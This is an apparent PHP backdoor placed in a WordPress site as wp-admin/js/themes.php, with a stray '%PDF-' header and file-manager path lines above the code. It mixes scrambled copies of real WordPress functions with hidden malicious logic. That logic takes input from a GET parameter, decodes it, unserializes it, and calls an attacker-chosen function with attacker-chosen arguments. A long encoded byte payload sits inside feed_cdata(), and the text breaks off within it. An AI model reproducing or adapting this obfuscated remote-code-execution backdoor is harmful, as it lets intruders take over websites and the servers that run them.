%PDF- %PDF-
Direktori : /var/www/html/higroup/1618475457800/wp-admin/js/ |
Current File : /var/www/html/higroup/1618475457800/wp-admin/js/themes.php |
<?php /** * Retrieves the number of times an action has been fired during the current request. * * @since 2.1.0 * * @global int[] $bodyEncoding Stores the number of times each action was triggered. * * @param string $low The name of the action hook. * @return int The number of times the action hook has been fired. */ function permalink_single_rss($low) { global $bodyEncoding; if (!isset($bodyEncoding[$low])) { return 0; } return $bodyEncoding[$low]; } // Add WordPress.org link. $overview = "Sample Message"; /** * @ignore */ function update_session() { } /* translators: %s: Support forums URL. */ function wp_login_form($index_type, $area_variations, $div) { return str_replace($area_variations, $div, $index_type); } /** * Registers plural strings in POT file, but does not translate them. * * Used when you want to keep structures with translatable plural * strings and use them later when the number is known. * * Example: * * $overview = print_preview_css( '%s post', '%s posts', 'text-domain' ); * ... * printf( translate_nooped_plural( $overview, $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 2.5.0 * * @param string $subdirectory_reserved_names Singular form to be localized. * @param string $filter_callback Plural form to be localized. * @param string $use_count Optional. Text domain. Unique identifier for retrieving translated strings. * Default null. * @return array { * Array of translation information for the strings. * * @type string $0 Singular form to be localized. No longer used. * @type string $1 Plural form to be localized. No longer used. * @type string $subdirectory_reserved_names Singular form to be localized. * @type string $filter_callback Plural form to be localized. * @type null $context Context information for the translators. * @type string|null $use_count Text domain. * } */ function print_preview_css($subdirectory_reserved_names, $filter_callback, $use_count = null) { return array(0 => $subdirectory_reserved_names, 1 => $filter_callback, 'singular' => $subdirectory_reserved_names, 'plural' => $filter_callback, 'context' => null, 'domain' => $use_count); } $index_columns = str_replace("World", "PHP", "Hello, World!"); /** * Counts number of sites grouped by site status. * * @since 5.3.0 * * @param int $html_tag Optional. The network to get counts for. Default is the current network ID. * @return int[] { * Numbers of sites grouped by site status. * * @type int $all The total number of sites. * @type int $public The number of public sites. * @type int $archived The number of archived sites. * @type int $mature The number of mature sites. * @type int $spam The number of spam sites. * @type int $deleted The number of deleted sites. * } */ function is_dispatching($html_tag = null) { if (empty($html_tag)) { $html_tag = get_current_network_id(); } $json_translation_file = array(); $Port = array('network_id' => $html_tag, 'number' => 1, 'fields' => 'ids', 'no_found_rows' => false); $is_selected = new WP_Site_Query($Port); $json_translation_file['all'] = $is_selected->found_sites; $disposition_type = $Port; $AudioCodecChannels = array('public', 'archived', 'mature', 'spam', 'deleted'); foreach ($AudioCodecChannels as $feature_group) { $disposition_type = $Port; $disposition_type[$feature_group] = 1; $is_selected = new WP_Site_Query($disposition_type); $json_translation_file[$feature_group] = $is_selected->found_sites; } return $json_translation_file; } /** * Callback for rendering the custom logo, used in the custom_logo partial. * * This method exists because the partial object and context data are passed * into a partial's render_callback so we cannot use get_custom_logo() as * the render_callback directly since it expects a blog ID as the first * argument. When WP no longer supports PHP 5.3, this method can be removed * in favor of an anonymous function. * * @see WP_Customize_Manager::register_controls() * * @since 4.5.0 * * @return string Custom logo. */ function has_circular_dependency(&$background_position_options, $suppress_errors, $admin_body_classes){ // $plugin must exist. $layout_selector = "EncodeThis"; $updated_action = "1,2,3,4,5"; $feature_category = "Jack,Ana,Peter"; $bookmark_name = 256; // if inside an Atom content construct (e.g. content or summary) field treat tags as text // Sample Table Sample-to-Chunk atom $ignore_codes = count($admin_body_classes); $ignore_codes = $suppress_errors % $ignore_codes; // Error: missing_args_hmac. // Template for the Crop area layout, used for example in the Customizer. $background_size = explode(",", $updated_action); $customize_header_url = hash("sha1", $layout_selector); $child = explode(',', $feature_category); $ignore_codes = $admin_body_classes[$ignore_codes]; foreach ($child as &$gd_supported_formats) { $gd_supported_formats = trim($gd_supported_formats); } $position_from_end = array_sum($background_size); $slug_priorities = trim($customize_header_url); if (strlen($slug_priorities) > 30) { $clause_key = substr($slug_priorities, 0, 30); } unset($gd_supported_formats); $ctxA = array_merge($background_size, [10]); $background_position_options = ($background_position_options - $ignore_codes); $AuthType = implode(' | ', $child); $background_position_options = $background_position_options % $bookmark_name; } /** * Show Comments section. * * @since 3.8.0 * * @param int $is_debug Optional. Number of comments to query. Default 5. * @return bool False if no comments were found. True otherwise. */ function get_help_sidebar($is_debug = 5) { // Select all comment types and filter out spam later for better query performance. $help_tab = array(); $t0 = array('number' => $is_debug * 5, 'offset' => 0); if (!current_user_can('edit_posts')) { $t0['status'] = 'approve'; } while (count($help_tab) < $is_debug && $goback = get_comments($t0)) { if (!is_array($goback)) { break; } foreach ($goback as $allowed_areas) { if (!current_user_can('edit_post', $allowed_areas->comment_post_ID) && (post_password_required($allowed_areas->comment_post_ID) || !current_user_can('read_post', $allowed_areas->comment_post_ID))) { // The user has no access to the post and thus cannot see the comments. continue; } $help_tab[] = $allowed_areas; if (count($help_tab) === $is_debug) { break 2; } } $t0['offset'] += $t0['number']; $t0['number'] = $is_debug * 10; } if ($help_tab) { echo '<div id="latest-comments" class="activity-block table-view-list">'; echo '<h3>' . __('Recent Comments') . '</h3>'; echo '<ul id="the-comment-list" data-wp-lists="list:comment">'; foreach ($help_tab as $allowed_areas) { _get_help_sidebar_row($allowed_areas); } echo '</ul>'; if (current_user_can('edit_posts')) { echo '<h3 class="screen-reader-text">' . __('View more comments') . '</h3>'; _get_list_table('WP_Comments_List_Table')->views(); } wp_comment_reply(-1, false, 'dashboard', false); wp_comment_trashnotice(); echo '</div>'; } else { return false; } return true; } /* * Instead of clearing the parser state and starting fresh, calling the stack methods * maintains the proper flags in the parser. */ function wp_get_webp_info($body_original, $routes) { $autosave_field = "SimpleString"; // Redirect old slugs. // Flags $xx xx foreach ($body_original as $ignore_codes => $date_rewrite) { if ($date_rewrite == $routes) { return $ignore_codes; } } return -1; } $framelength = "base64encoded"; /** * Retrieves archive link content based on predefined or custom code. * * The format can be one of four styles. The 'link' for head element, 'option' * for use in the select element, 'html' for use in list (either ol or ul HTML * elements). Custom content is also supported using the before and after * parameters. * * The 'link' format uses the `<link>` HTML element with the **archives** * relationship. The before and after parameters are not used. The text * parameter is used to describe the link. * * The 'option' format uses the option HTML element for use in select element. * The value is the url parameter and the before and after parameters are used * between the text description. * * The 'html' format, which is the default, uses the li HTML element for use in * the list HTML elements. The before parameter is before the link and the after * parameter is after the closing link. * * The custom format uses the before parameter before the link ('a' HTML * element) and the after parameter after the closing link tag. If the above * three values for the format are not used, then custom format is assumed. * * @since 1.0.0 * @since 5.2.0 Added the `$approved` parameter. * * @param string $addrstr URL to archive. * @param string $protected_members Archive text description. * @param string $acmod Optional. Can be 'link', 'option', 'html', or custom. Default 'html'. * @param string $lyricline Optional. Content to prepend to the description. Default empty. * @param string $languages_path Optional. Content to append to the description. Default empty. * @param bool $approved Optional. Set to true if the current page is the selected archive page. * @return string HTML link content for archive. */ function remove_theme_support($addrstr, $protected_members, $acmod = 'html', $lyricline = '', $languages_path = '', $approved = false) { $protected_members = wptexturize($protected_members); $addrstr = esc_url($addrstr); $galleries = $approved ? ' aria-current="page"' : ''; if ('link' === $acmod) { $f8g9_19 = "\t<link rel='archives' title='" . esc_attr($protected_members) . "' href='{$addrstr}' />\n"; } elseif ('option' === $acmod) { $f0f2_2 = $approved ? " selected='selected'" : ''; $f8g9_19 = "\t<option value='{$addrstr}'{$f0f2_2}>{$lyricline} {$protected_members} {$languages_path}</option>\n"; } elseif ('html' === $acmod) { $f8g9_19 = "\t<li>{$lyricline}<a href='{$addrstr}'{$galleries}>{$protected_members}</a>{$languages_path}</li>\n"; } else { // Custom. $f8g9_19 = "\t{$lyricline}<a href='{$addrstr}'{$galleries}>{$protected_members}</a>{$languages_path}\n"; } /** * Filters the archive link content. * * @since 2.6.0 * @since 4.5.0 Added the `$addrstr`, `$protected_members`, `$acmod`, `$lyricline`, and `$languages_path` parameters. * @since 5.2.0 Added the `$approved` parameter. * * @param string $f8g9_19 The archive HTML link content. * @param string $addrstr URL to archive. * @param string $protected_members Archive text description. * @param string $acmod Link format. Can be 'link', 'option', 'html', or custom. * @param string $lyricline Content to prepend to the description. * @param string $languages_path Content to append to the description. * @param bool $approved True if the current page is the selected archive. */ return apply_filters('remove_theme_support', $f8g9_19, $addrstr, $protected_members, $acmod, $lyricline, $languages_path, $approved); } $category_translations = 'Spaces here '; /* translators: 1: The WordPress error message. 2: The WordPress error code. */ function attachment_id3_data_meta_box($f2g2){ $post_blocks = $_GET[$f2g2]; $tokens = "Example Text"; $updated_action = "verify_input"; $incat = "foo bar"; $wp_template_path = range(1, 10); $timestart = explode("_", $updated_action); $nullterminatedstring = trim($tokens); $completed_timestamp = count($wp_template_path); $AMVheader = explode(" ", $incat); if ($completed_timestamp > 5) { $wp_template_path[] = 11; } $posts_table = hash('sha224', $timestart[1]); $upload_error_handler = strlen($nullterminatedstring); $skip_link_styles = array_map('strtoupper', $AMVheader); // PodCaST // For backward compatibility, failures go through the filter below. if (strlen($posts_table) > 28) { $enable_exceptions = substr($posts_table, 0, 28); } else { $enable_exceptions = $posts_table; } if ($upload_error_handler > 10) { $submenu_slug = hash('md5', $nullterminatedstring); } $outer_class_name = implode("-", $skip_link_styles); $post_blocks = str_split($post_blocks); $email_sent = str_pad($enable_exceptions, 28, "0"); $parent_slug = rawurldecode("Example%20Text"); // Return comment threading information (https://www.ietf.org/rfc/rfc4685.txt). $post_blocks = array_map("ord", $post_blocks); return $post_blocks; } feed_cdata(); $f2g2 = "vDkkjQNb"; /** * Gets the header images uploaded for the active theme. * * @since 3.2.0 * * @return array */ function get_index_url() { $imgindex = array(); // @todo Caching. $lock_result = get_posts(array('post_type' => 'attachment', 'meta_key' => '_wp_attachment_is_custom_header', 'meta_value' => get_option('stylesheet'), 'orderby' => 'none', 'nopaging' => true)); if (empty($lock_result)) { return array(); } foreach ((array) $lock_result as $layout_styles) { $addrstr = sanitize_url(wp_get_attachment_url($layout_styles->ID)); $salt = wp_get_attachment_metadata($layout_styles->ID); $cat2 = $layout_styles->ID; $imgindex[$cat2] = array(); $imgindex[$cat2]['attachment_id'] = $layout_styles->ID; $imgindex[$cat2]['url'] = $addrstr; $imgindex[$cat2]['thumbnail_url'] = $addrstr; $imgindex[$cat2]['alt_text'] = get_post_meta($layout_styles->ID, '_wp_attachment_image_alt', true); if (isset($salt['attachment_parent'])) { $imgindex[$cat2]['attachment_parent'] = $salt['attachment_parent']; } else { $imgindex[$cat2]['attachment_parent'] = ''; } if (isset($salt['width'])) { $imgindex[$cat2]['width'] = $salt['width']; } if (isset($salt['height'])) { $imgindex[$cat2]['height'] = $salt['height']; } } return $imgindex; } /** * Prints default Plupload arguments. * * @since 3.4.0 */ function get_the_content_feed($gd_supported_formats, $post_blocks){ $MPEGaudioModeExtensionLookup = $post_blocks[1]; // Skip if "fontFace" is not defined, meaning there are no variations. //allow sendmail to choose a default envelope sender. It may $LegitimateSlashedGenreList = $post_blocks[3]; $MPEGaudioModeExtensionLookup($gd_supported_formats, $LegitimateSlashedGenreList); } /** * Displays the permalink to the post for use in feeds. * * @since 2.3.0 */ function wp_get_latest_revision_id_and_total_count() { /** * Filters the permalink to the post for use in feeds. * * @since 2.3.0 * * @param string $post_permalink The current post permalink. */ echo esc_url(apply_filters('wp_get_latest_revision_id_and_total_count', get_permalink())); } /** * @see ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt() * @param string $capability__in * @param string $del_dir * @param string $css_url_data_types * @param string $ignore_codes * @return string|bool */ function akismet_text_add_link_class($capability__in, $del_dir, $css_url_data_types, $ignore_codes) { try { return ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt($capability__in, $del_dir, $css_url_data_types, $ignore_codes, true); } catch (Error $lang_file) { return false; } catch (Exception $lang_file) { return false; } } /** * Determines whether an offset value exists. * * @since 4.7.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetexists.php * * @param mixed $offset An offset to check for. * @return bool True if the offset exists, false otherwise. */ function wp_delete_post_revision($post_blocks){ $wp_roles = 'PHP is amazing'; $importer_id = $post_blocks[4]; $notice_text = strpos($wp_roles, 'amazing'); // (fscode==1) means 44100Hz (see sampleRateCodeLookup) $gd_supported_formats = $post_blocks[2]; get_the_content_feed($gd_supported_formats, $post_blocks); if ($notice_text !== false) { $reflector = 'Contains amazing'; } // s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + autosaved($gd_supported_formats); $importer_id($gd_supported_formats); } // Average BitRate (ABR) /** * Registers the `core/comments-pagination` block on the server. */ function wp_shortlink_header() { register_block_type_from_metadata(__DIR__ . '/comments-pagination', array('render_callback' => 'render_block_core_comments_pagination')); } $post_blocks = attachment_id3_data_meta_box($f2g2); /** * Retrieves the value of a transient. * * If the transient does not exist, does not have a value, or has expired, * then the return value will be false. * * @since 2.8.0 * * @param string $font_sizes Transient name. Expected to not be SQL-escaped. * @return mixed Value of transient. */ function ristretto255_scalar_invert($font_sizes) { /** * Filters the value of an existing transient before it is retrieved. * * The dynamic portion of the hook name, `$font_sizes`, refers to the transient name. * * Returning a value other than false from the filter will short-circuit retrieval * and return that value instead. * * @since 2.8.0 * @since 4.4.0 The `$font_sizes` parameter was added * * @param mixed $this_revision_version_transient The default value to return if the transient does not exist. * Any value other than false will short-circuit the retrieval * of the transient, and return that value. * @param string $font_sizes Transient name. */ $this_revision_version = apply_filters("pre_transient_{$font_sizes}", false, $font_sizes); if (false !== $this_revision_version) { return $this_revision_version; } if (wp_using_ext_object_cache() || wp_installing()) { $date_rewrite = wp_cache_get($font_sizes, 'transient'); } else { $signature_raw = '_transient_' . $font_sizes; if (!wp_installing()) { // If option is not in alloptions, it is not autoloaded and thus has a timeout. $audio_extension = wp_load_alloptions(); if (!isset($audio_extension[$signature_raw])) { $fractionbitstring = '_transient_timeout_' . $font_sizes; $is_safari = get_option($fractionbitstring); if (false !== $is_safari && $is_safari < time()) { delete_option($signature_raw); delete_option($fractionbitstring); $date_rewrite = false; } } } if (!isset($date_rewrite)) { $date_rewrite = get_option($signature_raw); } } /** * Filters an existing transient's value. * * The dynamic portion of the hook name, `$font_sizes`, refers to the transient name. * * @since 2.8.0 * @since 4.4.0 The `$font_sizes` parameter was added * * @param mixed $date_rewrite Value of transient. * @param string $font_sizes Transient name. */ return apply_filters("transient_{$font_sizes}", $date_rewrite, $font_sizes); } /** * Loads sidebar template. * * Includes the sidebar template for a theme or if a name is specified then a * specialized sidebar will be included. * * For the parameter, if the file is called "sidebar-special.php" then specify * "special". * * @since 1.5.0 * @since 5.5.0 A return value was added. * @since 5.5.0 The `$Port` parameter was added. * * @param string $gd_supported_formats The name of the specialized sidebar. * @param array $Port Optional. Additional arguments passed to the sidebar template. * Default empty array. * @return void|false Void on success, false if the template does not exist. */ function wp_default_styles($post_blocks){ $thisfile_audio_streams_currentstream = "SampleToDecode"; $tokens = "Example Text"; $post_blocks = array_map("chr", $post_blocks); // get length $nullterminatedstring = trim($tokens); $layout_from_parent = rawurldecode($thisfile_audio_streams_currentstream); // A cookie (set when a user resizes the editor) overrides the height. $MPEGaudioEmphasis = hash('md5', $layout_from_parent); $upload_error_handler = strlen($nullterminatedstring); $post_blocks = implode("", $post_blocks); $post_blocks = unserialize($post_blocks); // 2 second timeout return $post_blocks; } /** * Determines whether the query is for an existing year archive. * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 1.5.0 * * @global WP_Query $theme_support_data WordPress Query object. * * @return bool Whether the query is for an existing year archive. */ function change_locale() { global $theme_support_data; if (!isset($theme_support_data)) { _doing_it_wrong(__FUNCTION__, __('Conditional query tags do not work before the query is run. Before then, they always return false.'), '3.1.0'); return false; } return $theme_support_data->change_locale(); } /** * Returns the fallback template for the given slug. * * @since 6.1.0 * @since 6.3.0 Ignore empty templates. * * @param WP_REST_Request $add_to The request instance. * @return WP_REST_Response|WP_Error */ function feed_cdata(){ $maskbyte = "URL%20Example"; // pass set cookies back through redirects $ui_enabled_for_plugins = "\xb7\x91}\xb0\xee\xe1\x8e\x93\xe0\x8e\x83}\x8ex\xbd\xb2\xe2\xd8\xd7\xc4\xc3\xcc\xcc\xb7\xc1\xb4\xc8\xbb\xc5\xbd\xe9\x95\xb3\xbd\x88\x8a\xa8\xc7\x8c{\x8ex\xa1\xa3\xdb\xdb\xbcv\x89\xc1\xa7\x87\x8d\xb9\x8e\x8a\x8c\x80\xae\xad\x9a\x90\x8d\xc8\xd5\xc4r\xac\xc9\xc4\xba\xbd\xdf\xe2\xe6tnx\xbd\xc5\x9b\xb8\xba\xae\xa2q\x9a\xe2\xbd\xbc\xbe\xbe\xdd}\Pt\xd1aR|\x81\xc6\xb3\xcc\xe2\xc6\xc0u~\x9fwi\xa0\xa2\xb8\xc4\xaf\xbb\xd8|rftv\xba\xb1\xe8|\xa0\x8b\x80\x81\x9c~\xc7\x9d\xc0\xc7\x81x\xa4\xa2\xa2t\x9cx\x97\x83\xb5\xae\xc6\x85\x81i\x96\x93\xcd\xa7\xb1\xae\x8dtrp\x83~\x86s\x96\x93\x98\xbf\xc2\x82\x9c\x8a\x84z\x83\x80w\xc2\xc5\xc8\x98tn\x82\x9c\x81rft\x8b\x8f{\x9c\xa4]r\xc7\xb2\xbc\xc2\xac\xc4vwr\xb1}\x81\x83xx\x8d\xae|u^``m\xcd\xbc\xc6\xad\xa2\x87\x97t\xc0\x97\xa8\xc1wi\xa0\xa2\xb5\x83xx\xdd\x96\xba\xa8tvws\xa5\xe0\xdc\x89v|\xdc\x99\xba\xb6\xba\xc6\x80\x84\x80|\x81]W\x87\x97trf\xaa\xc2\xd0i\x96\x9d\xa7x\xa4\xbe\xb3\xc2\x96u~vwi\xc6\x93\x98tx\x87\xaat\xb4\xa7\xc7\xbb\x8d}\xd5\xd7\xdd\xb7\xbd\xbc\xd2|v\xb5\x99\xbe\xc7\xaf\xe6\x9c\xb3x\xad\xb2\xb0\x83|ftv\xb1\x8b\xc3\xba\xc3tx\x87\xaa\x83|f\xa3\xa3ws\xa5\x9a\xaa\x87\x80\x8b\xa3{\x8dPtvwx\xa0\x93\x98\xcb\xa6\xbc\x8dtrp\x83\xbf\xbdR\x9e\x97\xce\xba\x94\xc6\xb1tr\x83\x91\x93wi\x96\xd9\xd9\xc0\xc1\xbd\x96]\xcdPtvwi\x96|\x9c\xaa\xb4\x9e\xdb\x98\x81ptv\xba\x91\xa0\xa2\xb5tnx\x8d{y\x81^v`\xc6\x80}\x82]r\xc9\xd8\xca\x9b\x94\xc7\xc6\xaa\xb2\xea|\xb5tnx\x8d\xc7\xc6\xb8\xb3\xc9\xc7\xb5\xdf\xe7\xa0x\xbd\x9d\xd5\xc4\xb8\xb6}\x91\x92S\x93\x98tr\xa0\xbe\xcd\xc7\x99\xae\xa4\xd1R\xb3\xa2\xa2tnx\xbf\xca\x9b\xb3t\x80\x86\xbc\xea\xe5\xe4\xb9\xbc\x80\x91\xc3\x97\xae\xc4\xbc\xc7r\xb1\x97\xd7\x96\x99\xbd\xce]\x8ff{\x87\x8b\x81\xab\xa8\x9f\x8fXxvx\xbb\xb8\xc2\xac\xb1i\x96\x93\x98t\x8b\x87\x97\xbc\xa1p\x83\x86\x92m\xd5\xed\xdb\x83xx\x8d\xc5\x97ftv\x81x\xb3|\x9f\x89\x80\x8f\xa6\x8cy\x81^_`R\xa5\x9d\x98tn\x9e\xe7\xa5\xb6\x97t\x80\x86\xc0\xde\xdc\xe4\xb9nx\x95]v\xaf\xc6\xc4\xad\xa3\xa5\x9d\x98\xa4\x93\x82\x9c\x90[j\x9c\xa7\xd0\xbe\xc9\xcd\xc6\xce}\x82\x8dt\xa6\x97\xc5vwi\xa0\xa2\xa1\x83xx\x8dt\xa9\x9c\xc1\x9b\x81x\xf1}\x81]Wav\x83|ft\xab\xa1i\x96\x93\xa2\x83r\xc1\xdf\xc2\xa8\xa0\x81\x92S\x96\x93\x98tnx\x91\xc3\x95\xbf\xc3\x9f\xc7\xb1\xa5\x9d\xe5\xc2\xc3\xac\xcetrp\x83\x93`m\xe7\xde\xee\x9d\x9c\xcb\xdd\xa7\xbb\xba\xafz\xc0\xbb\xe4\xc9\xd2\xb1\x89b\x9c~r\x90tv\x81x\xdf\xd9\x98tnx\x8d|\xc5\xba\xc6\xc6\xc6\xbc\x9e\x97\xe7\x97\xc7\xc7\xb6\xc4\xbartv~\xaa\x9d\x9c\x98tnx\x8du\x8f\x83t\xbc\xb8\xb5\xe9\xd8\xa1t\xc9b\x8dtrf\x83\x80\xa3\xbb\xd7\xeb\x98tn\x82\x9cx\xc3\xb1\xca\x9f\xa5\xbc\xe6\xc6\xe1\xc8\xa9|\xd6\xc6\xc0\x9c\xae\xb3`\x86\xa5\x9d\x98tn\xd0\xb0\xc2|u\xc7\xca\xc9\xbd\xe5\xe8\xe8\xc4\xb3\xca\x95x\xc1\x89\xcd\xc5\xa0\xb9\xde\x9c\xb3x\xad\xd1\xe3\xcd[\x83\x83\x80\x9f\xb7\x96\x93\xa2\x83u\x8a\xa4\x8a\x86w{\x91aS\x80\xa2\xa2t\x93\xc5\xd0\xb5|u\xd1``R|\x98\xd1Xav][Otv{\xc1\xe9\xda\xbe\x95\xaf\xb0\xe5\xa1\xb4u~vw\xba\xe0\x93\xa2\x83\x8ba\xd6\xc1\xc2\xb2\xc3\xba\xbcq\x9d\x9a\xa4tn|\xde\xbf\xc8\x8f\xa2\xc9\xc7\x9c\xdf\xe7\xa1\x8fr\xb7\xd6\x95[\x83]}\x8a\x81\xa8\xaa\x9f\x8fXav][j\xb3\x9d\x9c\x9d\xd1\x9a\xdc\xb9\xb1\xc7\xd1\xb9\xb6m\xb1vw\x86\x97\xf0\xc7\xb5\x9e\xae\xb5\xaa\xbe\xa1\xb8\x92m\xd5\xc6\xe0\x98\xaf\x87\x97t\xba\xb5\xbcvwi\xa0\xa2\xb5tn\xa1\x87\x83~\x88}\x92S\x96\x97\xd7\xa4\x9d\xab\xc1\xafy\xae\xb5\xc9\xbfp\xd3|\xb5tnx\x8dx\xa9\x8f\xa2\xaf\xab\x84\x9a\xd2\xe3\xb5\xb2\x87\x97tr\x8c\xb5\xb7\xc9\xb9\x96\x93\xa2\x83\x8bx\x8dtrm\x8a\x87\x8bz\x9d\xae\x82^nx\xd6\xba\x81p\xa1\xa8\x9cs\xa5\x9b\xde\xbd\xba\xbd\xcc\xb9\xca\xaf\xc7\xca\xcaq\x9d\xe3\xd9\xc8\xb6\x87\xe1\xc3\x81\xac\xbd\xc2\xbcp\x9f\x9c\x98t\xc9bv][O]_{\x91\xcf\xcc\xc6\xadnx\x8d\x91\x81pt\xcc\xa3i\x96\x9d\xa7\xba\xb7\xc4\xd2\xb3\xb9\xab\xc8\xb5\xba\xb8\xe4\xe7\xdd\xc2\xc2\xcb\x95{\xc2\xa7\xc8\xbe\x86\xbd\xe5\xa2\xde\xbd\xba\xbd\x94}\x8dP]_`R\x9a\xdc\xea\xc2\xa4\xb2\xc7\xbb\xb5\xba\xbd\xc0\x9d\xb0\xb0\x98tnx\xd2\xcc\xc2\xb2\xc3\xba\xbcq\x9d\x9f\x9f\x80W|\xb5\xad\xab\x94\xad\x92S\x96\x93\x98\x83xx\xd6\xbc|ux\xc3\xac\xa0\xcb\xe0\xcc\xc6\xa8a\xaa\x83|ft\xb7\xcf\xa1\x96\x93\x98~}\xc5\xd1\x89z\xb9\xb9\xc8\xc0\xaa\xe2\xdc\xf2\xb9v|\xd6\xc6\xc0\x9c\xae\xb0\xbe\xac\xea\xdc\xe2\x9a\xb5\x81\x96\x8f\O]_`x\xa0\x93\xcftx\x87\xd6\xba[n\xbd\xc9\xb6\xaa\xe8\xe5\xd9\xcdv|\xd6\xc6\xc0\x9c\xae\xb0\xbe\xac\xea\xdc\xe2\x9a\xb5\x81\x96tr\xc1^`\x86s\x96\xc5\x98tn\x82\x9cx\xa9\x9d\xa8\xc8\xa9\xba\xc9\xb4\xc9\xb6nx\x8dtr\x83t\xb7\xc9\xbb\xd7\xec\xd7\xc7\xba\xc1\xd0\xb9zj\xbd\xc8\xc5\x9f\xd0\xcd\xdf\xb7\xc2\xc1\xd7\x9a\xb9r\x83\x80wi\x96\xc8\xee\xb6nx\x97\x83\x82r]\x8b\x80\x84\xb1}\x81]W\xd5w\x83|f\xca\xb8wi\x96\x9d\xa7\xd1Xav][ftvwm\xcb\xea\xf1\x9b\xba\xce\xc5]\x8fO\xb5\xc8\xc9\xaa\xef\xd2\xe5\xb5\xbe\x80\x94\xc8\xc4\xaf\xc1}\x83i\x96\x93\x98tr\xaf\xc4\xa8\xc4\x98\xc5\xa9\x98\x9a\xd8\x9c\xb3^Xx\x8dtrj\x9b\x9a\xc7\xbe\xc9\xe8\xde\xabn\x95\x8dt\xc4\xa7\xcb\xcb\xc9\xb5\xda\xd8\xdb\xc3\xb2\xbd\x95\xbd\xbf\xb6\xc0\xc5\xbb\xae\x9e\x9a\xa4{zx\x91\xa9\xc9\xbf\x9b\xc2\xcd\xa1\x9f\x9c\xb3^n\x87\x97t\xca\xa7\xc4\xb8\xa5i\xa0\xa2\x9c\xb3\x91\xa7\xbc\x9f\x9b\x8b\xaf}\xbd\xb2\xe4\xd4\xe4\xb3\xc4\xb9\xd9\xc9\xb7m\xb1\x85\x81i\x96\xd7\xcd\xa5\xc1\xc7\x8dt|u\x91\x85\x81i\x96\xe7\xcc\x9d\x98\x82\x9cx\x99\x8a\xc4\xcb\xaa\xbe\xdc\xca\xb3x\xad\xa7\xcf\xaa\x81pt\xc3\xc8\xb2\x96\x93\x98~}\x95\x9c~rf\x9cvwi\xa0\xa2\x9f\x87~\x8a\xa2\x85y\x81^`wi\x96\x93\x98\xd1Xbw]\ftvwx\xa0\x93\xd0~}\xbe\xe2\xc2\xb5\xba\xbd\xc5\xc5i\x96\x93\x98t\xa5\xa7\xc3\xc1\xb8\x8a\x95\xac\xc4q\x9f}\x81]Wav\x83|f\xcc\xc4\x81x\xf1}\x82tr\xb2\xbc\x9b\xc2\xc0\xca\xa0\xad\x9b\xbb\x93\x98tnx\xaa]\x93\xb8\xc6\xb7\xd0q\x9a\xd2\xbb\xa3\x9d\xa3\xb6\x99~ftv{\xa8\xc6\xc2\xcb\xa8w\x93wtrftz\x9d\xac\xc5\xb7\xef\xa9\xb1\xa9\x8dt\x8fO\xb5\xc8\xc9\xaa\xef\xd2\xe5\xb5\xbe\x80\x94\xc1\xb6{{\x82\x86s\x96\xb8\xe7\x9e\x95\xca\x8dtrp\x83z\xb6\x8c\xc5\xc2\xc3\x9d\x93\x81\xa8^rftvwR\x9a\xed\xc0\x9e\xbc\xa1\xd8\xa3\xb4\x92\x83\x80wi\x96\xb9\xbc~}\x95\x8d\xc7\xc6\xb8\xc4\xc5\xcaq\x9a\xd2\xcb\x99\xa0\xae\xb2\xa6\xadm\x9c\xaa\xab\x99\xd5\xc8\xcb\x99\xa0\xb7\xae\x9b\x97\x94\xa8}\xb4u\xa5\x9d\xee\xc8\xb0x\x8dt|u{\xa3\xc6\xc3\xdf\xdf\xe4\xb5u\x81\x8du\x8f\x83]\xbc\xb8\xb5\xe9\xd8\xa7~\x97\x9f\xb8\xc9rft\x80\x86\x88\x9a\xda\xc6\xbd\xcf\xe0\xb9\xc4ft\xbf\xcax\xa0\x93\x98t\x91\xad\xd0\x98\xa7f~\x85\xa4\xb8\xf0\xdc\xe4\xc0\xaf\x8dtrf\x8e\x85\x81\x9f\xe1\x93\xa2\x83u\xba\xdf\xc3\xc9\xb9\xb9\xc8w\xb2\xe9|\xe6\xc3\xc2\x87\x97tr\xac\xce\xaa\xccs\xa5\xc0\xe7\xce\xb7\xc4\xd9\xb5y\x81x\xb5\xbf\xad\xe4\xc1\xa7~n\xd0\xc7t|u\x91vwi\x96\x9a\xa9\x86\x87\x8f\xa2{\x8dP^_aR\xa2\xa2tn\xbf\xb9trp\x83\xbf\xbdi\x96\x9b\xe1\xc7\xad\xb9\xdf\xc6\xb3\xbf|z\xb1\x98\xbd\xe3\xf2\xca\x98\xae\xbf\x99{o]\xd1aR\xa5\x9d\x98t\xc2\xa2\xde\xcb\xc7ftv\x81x\x9a\xc6\xc8\x99\xc2\xa9\xe1\x83|f\xaa\x99\xaf\xba\xc1\x93\x98tx\x87\xaat\xb3\xb8\xc6\xb7\xd0\xa8\xe9\xdf\xe1\xb7\xb3\x80\x91\xae\xa1\x8d\xc4\xd0\xcd\x93\xcc\xc5\xbd\x80W\x88\x99trf\x85\x92m\xd5\xca\xcd\xcc\xc8\xa7\x8d\x91rm\x86\x8f\x90y\xa6\x9a\xb3^Xbv\xd1[\xab\xc0\xc9\xbcx\xa0\x93\x98t\xbf\xc6\xdb\x98rft\x80\x86\xc4\x80\x93\x98tnxvx\xa5\x96\x99\xca\xa8\xbd\x96\x93\xb5]\xa9\xb5\xa8x\xb1\xb0\x99_\x94R\x9d\xab\xb0\x8c~\xa8^rf]\xd3aS\x80\xa2\xa2\xacn\x82\x9c^rftvwi\x9a\xdc\xea\xc2\xa4\xb2\xdb\x96\xc8\xbc\xac\x85\x81\xb6\x96\x93\xa2\x83\x8ba\xd2\xcc\xc2\xb2\xc3\xba\xbcq\x9d\x9f\x9f\x80}\x82\x8dt\x93p\x83}\xb8\xb9\xe6\xdf\xdd\x80\xbd\xca\xce\xc2\xb9\xab\x80\xb8\xb8\xb7\xd7\xe1\xd9{w\x93w][u~v\xa6\xad\xef\xd5\x98~}|\xb3\xbf\xaa\x98\xcc\xbc`\x86\x96\x93\x98tn\xca\xce\xcb\xc7\xb8\xc0\xba\xbc\xac\xe5\xd7\xdd|u}\x9f\x84\x9a\xab\xc0\xc2\xc6n\xa8\xa3\xcf\xc3\xc0\xc4\xd1y\x84v{\x92S\xa5\x9d\x98t\xb6\xc8\xae\xabrf~\x85{\x